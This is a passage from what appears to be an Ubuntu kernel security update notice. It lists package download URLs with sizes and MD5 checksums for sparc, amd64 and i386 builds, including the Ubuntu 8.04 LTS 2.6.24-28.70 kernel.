http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    42314 7f7347a9dfcafcc43469d4d4364c1af8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    44916 2641528d804b1c1dd2f7d0e04f3a044b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   320330 6aff8b286b3ddf7dfc33ce99f504f1e8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   324878 11ab2f5d09092b3f9797e673e413ab2c

sparc architecture (Sun SPARC/UltraSPARC):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:    50478 116bcbef4cbedbce5345d410424b6463
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:     2354 df747032ea1217e02817c8dec92bcd75
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:    40376 4337e5c50ab6220a5ee46b46f98669f8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:   110558 bfa3abba4946456a8f6d99a1a405f72e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:    41214 7fa46c5fc72ef82e476804fcb3c3560e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:   104226 3208d817b562267bba9539f854fe388b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:     7436 87a0b43fa978113a74cb8e79b8dd4774
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:   149312 9341cb99291093f7e5624f6e9f3c9daa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:  1712908 f0e841e92ee8a38b75543485f86a2b4c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.84_sparc.deb
  Size/MD5:   771900 6c8197f994e366ec847414a13eb7b906
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.84_sparc.deb
  Size/MD5:   771444 46d3fb1d75439b65635bfaac6d653d74
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.84_sparc.deb
  Size/MD5:  6963130 11d85b5ba6c6e5d333b860b7a5163b5d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.84_sparc.deb
  Size/MD5: 15016950 1f36bbfe3b2db1e844d76d984a4a661a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.84_sparc.deb
  Size/MD5: 14832050 bc36836f43a994fb29143301526c2ace
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:     7436 76dc77e08053d579849c4c09c8328b80
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:   248770 dd30a7c1c47f07012b5bf0ee7fd16ca4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:   212536 bf4b63251214a4622ce5a55f902203bb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:  1048476 575854b9cc92279f65c4acfa0a60e43c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:  1482448 de80e93cfd56c729a74ded3b97946846
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:    10114 4a3f85652ffd60eb4a94ab3093227db2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:    40176 660660949865f2de6403ad165b9faa60
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:     9368 65475425005847418b7d9380e4fed4a7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:    61402 264bfd4456975f04ca592789983eb77b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:   163278 1df17d4edff53b6e1102ab15ff671216
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:    64092 52a9af94cf9a1ace816d3b1b727738dd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:  1235410 e44d8dda7d391021570cc0a826f6c5fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:    59308 00fbe909018b76d099f47d9c39d72a26
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:    37426 56112905d8bef55a258eb7aa59cb946b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb
  Size/MD5:   280130 fb9c0d56db0d19a09524d36af51f4687

Updated packages for Ubuntu 8.04 LTS:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-28.70.diff.gz
  Size/MD5:  4813262 c1da8b33fcf63ededcc7ab2498e4c964
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-28.70.dsc
  Size/MD5:     2258 f1f1a3629c40ac86e1b6172f2f3966cc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz
  Size/MD5: 59085601 e4aad2f8c445505cbbfa92864f5941ab

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-28.70_all.deb
  Size/MD5:  4932582 c75bb688dfed58df39fa72161bc6471c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28_2.6.24-28.70_all.deb
  Size/MD5:  8149016 f80aeb18376bc0371a80a5acbbc4f042
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-28.70_all.deb
  Size/MD5:   100904 3996ef6a1321c852676912837f7d9896
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-28.70_all.deb
  Size/MD5: 46982104 a90fab943db79ec907e1cbf97c869092

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    28610 b861f6c6aa20728c83bbc0ec9ae239a0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   224204 bd768c83d861caa00758232ec48f21f7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    52648 663642186c3344039e31afcf1d88b48f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    40640 9ea576c926e3b3b68dd2f98f2c7b634f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    48646 d00ff865f10bd95cfe0d7f556fd96135
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    86332 d969a4a0657104af706645718743733d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    36314 98ac23e9bc91e2a54840f86bdd6e96ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   648768 458b6968f63bc8134e62c47e8a9be732
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   209944 04c1a8cd3bf7a25da0e78fbb8f90d111
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    39192 254eeda71366bfe9c3e4f7b56828f526
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    67984 29f9c63dbfd2f8f86ea71b2e9cae813b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   145448 689d507482ed8b85fd15f33d8bdfe737
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   287268 73a2edaf7afc4a65aa77e8995ed3b3e2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:  2130812 20affc23d001c3a542b0adfa947e12eb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-generic_2.6.24-28.70_amd64.deb
  Size/MD5:   675578 f6d7fe8d4eda5ed7e6e4edd2ab9fa2ec
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-openvz_2.6.24-28.70_amd64.deb
  Size/MD5:  1254372 28e7eaca202b7aefa71b0e3e943d98a7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-rt_2.6.24-28.70_amd64.deb
  Size/MD5:  1276462 1d5f451c0c43c965d585e34d0799dc77
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-server_2.6.24-28.70_amd64.deb
  Size/MD5:   675490 1ea0767f5025162a3350687d3977c1a1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-xen_2.6.24-28.70_amd64.deb
  Size/MD5:  1086568 643d57e3d1cbb403787588819535ba3a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-generic_2.6.24-28.70_amd64.deb
  Size/MD5: 17815434 ca2be2f4f00cd6c412beec384e6569d6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-server_2.6.24-28.70_amd64.deb
  Size/MD5: 17785084 624ae6cd24926052048734802477e137
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-generic_2.6.24-28.70_amd64.deb
  Size/MD5: 21063276 fa087ed3f1b02b40b09dcfe89d45f73d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-server_2.6.24-28.70_amd64.deb
  Size/MD5: 21435602 6dac3b165e31f9409240389cd33138ee
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-28.70_amd64.deb
  Size/MD5:   709144 770ddfa645769cb3bbd36fd3213da463
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   263670 68ff4af3d2752a5d3965eff926890319
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   176414 a2b597847575190f35acc23e2230fee8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   254100 6c70433fbed951cd97797092952efc2b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:  1642020 5664065e58da802295747e9c7c21b698
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   143712 9a418be17d9afe53a5c7add5e90a28b6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   164464 325e24198ba529100a5840ae1b0e2550
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   115852 6b155bc2fa1e59e144c57fad46a9acdd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    35060 73537c193f7fa3caf4007cc7348e9d28
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    64402 7760e6acdb5dda4b37ffd2fdd33ae658
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    69710 e6bcf4e9b94aaf83a2fd640e7364a34e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    21596 805227e007ba9dee7f04bf59aafb050c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:     8616 16e18d90244e835d0cbc5ae9c571c641
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    57230 06f30cc1a982671b53e5ca5c8d362aea
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   103038 e571751777dc6cdc16f498add459f799
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:  1212558 c1a1947cc4f37c7b1479ece74e399a51
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    45496 6f25ee67a63dfc757d82883b8162b268
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    12774 87bfa70fab065ed960c4249106df6219
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:   499398 f50e6a5d591d124ea04b8e5c19683404
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb
  Size/MD5:    75052 f0253d9acbcf3f06cd0da60e7457c50d
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-openvz_2.6.24-28.70_amd64.deb
  Size/MD5: 19262374 07ff7910c9e0ae1589fcaf93c1fb8acd
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-rt_2.6.24-28.70_amd64.deb
  Size/MD5: 17913162 6999b14fbb5cc112d64c9bfcbf475477
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-xen_2.6.24-28.70_amd64.deb
  Size/MD5: 18914794 a43117499bda8bccd98e185bde493749

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    23686 18bd8e09ccdca0f38c09197958ac5524
http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    26796 46c1f483a8ad20c903e6354c68ee3389
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:   218826 7a0c579b79c0d53f5d8cb405070c7e38
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:   220472 70a3539d19ebf9be4e7aed9141f64945
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    51924 ed915e6f13fa7a452e37810ed2589698
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    52058 9c19d0affe1777b36dbcd835e95a72b2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    38326 a9041a4039d457f26060784b609ba48c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    39078 393f5a163cbad634e8ba8ff17866e315
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    45994 0b5101e40b38f62278cca75a543f88d0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    46166 8a3cd2550f4bc59515ee72f87d40e093
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    83250 4f57f0e75de3e3884c350df0a92646d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    83650 a29ba07db6908cc0dcfc6fa69c5d154f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    32396 e09725b6cd2edb1c99b954931ea30a3d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    32674 74a1c018bdd24a81f56e2f5ca76c86f2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:   637742 bb0af8a13cbf714fbbe316376f843bbb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:   655916 503b7879d411c641f10d813d027e745c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:   209854 ff86bb3742203e7bd44a5db87ce40361
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:   213616 aa25de1453a8512619d62d66a98c783b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    46562 90e5237cdfc6e54b145b6e13ffdda47d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    47604 a9d621b700d5b56e23025357604f0487
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    62268 e00dd9915a2e92d3b4a7d7908b2194fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    63630 8d854a96bc559b4d87294ece7e79d03c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:   130542 2e4009a596d1672486dee5aa3c8b2423
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:   137028 da2ceb3ce4e2f0dcfd70cafba0d3eade
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:   279082 63e74d6a553fb1725f661340eec544a5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:   277692 6cad6bee962600c17282346550b40ddd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:  2012888 14bce971d0e20c69df861da2a2b960bd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:  2089262 98b4049286d60bfd3473da45ce332991
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-386_2.6.24-28.70_i386.deb
  Size/MD5:   656922 58714a2e1fcc17e1fd89740aeee114f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-generic_2.6.24-28.70_i386.deb
  Size/MD5:   659532 f17700bc40e9e3e0d003225207da7c61
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-openvz_2.6.24-28.70_i386.deb
  Size/MD5:  1244404 a00ae4dde9d6a921b17bda0e2fd86790
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-rt_2.6.24-28.70_i386.deb
  Size/MD5:  1264690 1e454c5f6a51b34c6f336d69269ba277
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-server_2.6.24-28.70_i386.deb
  Size/MD5:   661210 385cebd0decb92d51bbea38c77f4ea27
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-virtual_2.6.24-28.70_i386.deb
  Size/MD5:   563854 3806e67c965a034bd8fd0873914baad5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-xen_2.6.24-28.70_i386.deb
  Size/MD5:  1061360 2a3ad99a1b108041578893878a8637a0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-386_2.6.24-28.70_i386.deb
  Size/MD5: 18384498 e8f5c0e7addd09241b7ef435a727637a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-generic_2.6.24-28.70_i386.deb
  Size/MD5: 18402466 0a06a6aad92ccebecf63da2c5966d277
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-server_2.6.24-28.70_i386.deb
  Size/MD5: 18519954 bf9ef7f9445cfc22787b17d74d8d5900
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-28-virtual_2.6.24-28.70_i386.deb
  Size/MD5:  8734136 0a8147e9d7bee6bc870bdc3208279eba
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-386_2.6.24-28.70_i386.deb
  Size/MD5: 25549924 8d030bc507ceb77d0fc6ae4bef22e118
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-generic_2.6.24-28.70_i386.deb
  Size/MD5: 26364898 875fb60bc5bf8621b97c5574d07e55c8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-server_2.6.24-28.70_i386.deb
  Size/MD5: 27385008 9bec1d2b2b78583fcecedcd5c8ff3960
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-virtual_2.6.24-28.70_i386.deb
  Size/MD5: 24877718 482b8cef0cf005a8483d11ed3b364964
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-28.70_i386.deb
  Size/MD5:   709188 26cf4f59b5a9cb16b1c5288e9ecbea34
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:   258828 643f05e4db376d0bf7558133f91a3cfb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:   264144 8770cbfb2e0e62965819cc57092f779e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:   163268 f173ed5d6f19c886c3e05041e233e310
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:   163024 6bb17cdade9c310a5d75eeca5908b7e3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:   236736 01de1ba5a354f340f81355f9e7ade04a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:   244974 b86f7aaf1e9200b8f4e91d0455f311f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:  1810636 aaf2ac4ebeb43a06da06b3d74abc4029
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:  1827690 3f37ecbc8236e915a23a1c308613910e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:   150834 dc34df5d314fbf390ef32a5695e2d4e4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:   143006 007db1ea88bc4bbf545e989cace61c1e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:   156088 f046f30af354e4423fa7f6929efa9cfc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:   157156 daa0873f69f4fa6a3e2c6a3f70a98dad
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:   107216 11c20967c4aba25588cd33e41c62f577
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:   108514 6d7f89b2f04c023440977996d99b1a09
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    32952 8f3f5c65701052b71bbcd200e9727d68
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    33384 959583f504cdc92260a2e9cd7f154fba
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb
  Size/MD5:    60690 46b409f735bcf21fbdcdd069421998bb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb
  Size/MD5:    61148 2015776c1d327adfa0c00c77d14e7ca8
